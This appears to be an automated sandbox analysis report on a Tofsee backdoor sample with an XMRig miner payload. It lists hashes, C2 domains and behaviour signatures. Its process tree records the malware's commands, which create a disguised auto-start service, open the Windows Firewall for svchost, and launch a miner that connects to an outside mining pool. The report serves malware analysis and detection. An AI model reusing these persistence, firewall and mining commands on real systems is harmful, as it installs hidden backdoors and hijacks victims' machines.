Analysis

  • max time kernel
    145s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    06-06-2022 11:32

General

  • Target

    57efeee8a462cb7aad1342613a7afb96.exe

  • Size

    262KB

  • MD5

    57efeee8a462cb7aad1342613a7afb96

  • SHA1

    3fafa99c551edd87e9faadefc600f324c8203542

  • SHA256

    1d8b78fcbb6f3e68c24f759b86c7cea38f5b5642a9d2c556cc9c35a7ee24b8d4

  • SHA512

    1cfb3ef43304a6bd4368eb875e7a50ed88b0cd60ad477a95197f9be7bfe32930c1e1d3cd15a8e7793c6c594727e521c4d96d4fd1097733410400a8f100c4daf1

Malware Config

Extracted

Family

tofsee

C2

svartalfheim.top

jotunheim.name

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 2 IoCs
  • Creates new service(s) 1 TTPs
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe 3 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • Modifies data under HKEY_USERS 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\57efeee8a462cb7aad1342613a7afb96.exe
    "C:\Users\Admin\AppData\Local\Temp\57efeee8a462cb7aad1342613a7afb96.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:5016
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\phmbtpem\
      2⤵
        PID:4332
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\jfadnjny.exe" C:\Windows\SysWOW64\phmbtpem\
        2⤵
          PID:2748
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create phmbtpem binPath= "C:\Windows\SysWOW64\phmbtpem\jfadnjny.exe /d\"C:\Users\Admin\AppData\Local\Temp\57efeee8a462cb7aad1342613a7afb96.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
          • Launches sc.exe
          PID:3240
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" description phmbtpem "wifi internet conection"
          2⤵
          • Launches sc.exe
          PID:2196
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" start phmbtpem
          2⤵
          • Launches sc.exe
          PID:1624
        • C:\Windows\SysWOW64\netsh.exe
          "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
          2⤵
          • Modifies Windows Firewall
          PID:4684
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 5016 -s 784
          2⤵
          • Program crash
          PID:2408
      • C:\Windows\SysWOW64\phmbtpem\jfadnjny.exe
        C:\Windows\SysWOW64\phmbtpem\jfadnjny.exe /d"C:\Users\Admin\AppData\Local\Temp\57efeee8a462cb7aad1342613a7afb96.exe"
        1⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:3548
        • C:\Windows\SysWOW64\svchost.exe
          svchost.exe
          2⤵
          • Sets service image path in registry
          • Drops file in System32 directory
          • Suspicious use of SetThreadContext
          • Modifies data under HKEY_USERS
          • Suspicious use of WriteProcessMemory
          PID:4668
          • C:\Windows\SysWOW64\svchost.exe
            svchost.exe -o fastpool.xyz:10060 -u 9mLwUkiK8Yp89zQQYodWKN29jVVVz1cWDFZctWxge16Zi3TpHnSBnnVcCDhSRXdesnMBdVjtDwh1N71KD9z37EzgKSM1tmS.60000 -p x -k -a cn/half
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:3620
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3548 -s 520
          2⤵
          • Program crash
          PID:224
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 5016 -ip 5016
        1⤵
          PID:1756
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 3548 -ip 3548
          1⤵
            PID:1768

          Network

          MITRE ATT&CK Enterprise v6

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\jfadnjny.exe
            Filesize

            14.8MB

            MD5

            d26e463a2feab2ad75278f1f5af5701d

            SHA1

            d9cdbaf61c543570448a1abb233e3163a72931f4

            SHA256

            e3f20017c1ed02b2f3cf6585512feadcf1bd30eb2e6aad4fbf19bb75d04d849f

            SHA512

            208939071ccd0eab64e3243669c7d62362eb8fe5df25be8a7da68d9e90f9497f781906e8bf279d3e12d79202cbe220b075c62e18cda6c58809a829a22d1f5fb0

          • C:\Windows\SysWOW64\phmbtpem\jfadnjny.exe
            Filesize

            14.8MB

            MD5

            d26e463a2feab2ad75278f1f5af5701d

            SHA1

            d9cdbaf61c543570448a1abb233e3163a72931f4

            SHA256

            e3f20017c1ed02b2f3cf6585512feadcf1bd30eb2e6aad4fbf19bb75d04d849f

            SHA512

            208939071ccd0eab64e3243669c7d62362eb8fe5df25be8a7da68d9e90f9497f781906e8bf279d3e12d79202cbe220b075c62e18cda6c58809a829a22d1f5fb0

          • memory/1624-138-0x0000000000000000-mapping.dmp
          • memory/2196-137-0x0000000000000000-mapping.dmp
          • memory/2748-134-0x0000000000000000-mapping.dmp
          • memory/3240-136-0x0000000000000000-mapping.dmp
          • memory/3548-147-0x0000000002FBE000-0x0000000002FCE000-memory.dmp
            Filesize

            64KB

          • memory/3548-149-0x0000000000400000-0x0000000002DB8000-memory.dmp
            Filesize

            41.7MB

          • memory/3620-175-0x0000000000600000-0x00000000006F1000-memory.dmp
            Filesize

            964KB

          • memory/3620-170-0x0000000000600000-0x00000000006F1000-memory.dmp
            Filesize

            964KB

          • memory/3620-169-0x0000000000000000-mapping.dmp
          • memory/4332-133-0x0000000000000000-mapping.dmp
          • memory/4668-157-0x0000000002760000-0x0000000002770000-memory.dmp
            Filesize

            64KB

          • memory/4668-151-0x0000000003000000-0x000000000320F000-memory.dmp
            Filesize

            2.1MB

          • memory/4668-166-0x00000000033D0000-0x00000000033D7000-memory.dmp
            Filesize

            28KB

          • memory/4668-142-0x0000000000000000-mapping.dmp
          • memory/4668-148-0x00000000012E0000-0x00000000012F5000-memory.dmp
            Filesize

            84KB

          • memory/4668-163-0x0000000007E80000-0x000000000828B000-memory.dmp
            Filesize

            4.0MB

          • memory/4668-150-0x00000000012E0000-0x00000000012F5000-memory.dmp
            Filesize

            84KB

          • memory/4668-143-0x00000000012E0000-0x00000000012F5000-memory.dmp
            Filesize

            84KB

          • memory/4668-154-0x0000000002750000-0x0000000002756000-memory.dmp
            Filesize

            24KB

          • memory/4668-160-0x00000000027F0000-0x00000000027F5000-memory.dmp
            Filesize

            20KB

          • memory/4684-139-0x0000000000000000-mapping.dmp
          • memory/5016-130-0x0000000002F42000-0x0000000002F52000-memory.dmp
            Filesize

            64KB

          • memory/5016-141-0x0000000002F42000-0x0000000002F52000-memory.dmp
            Filesize

            64KB

          • memory/5016-146-0x0000000000400000-0x0000000002DB8000-memory.dmp
            Filesize

            41.7MB

          • memory/5016-132-0x0000000000400000-0x0000000002DB8000-memory.dmp
            Filesize

            41.7MB

          • memory/5016-131-0x0000000004B10000-0x0000000004B23000-memory.dmp
            Filesize

            76KB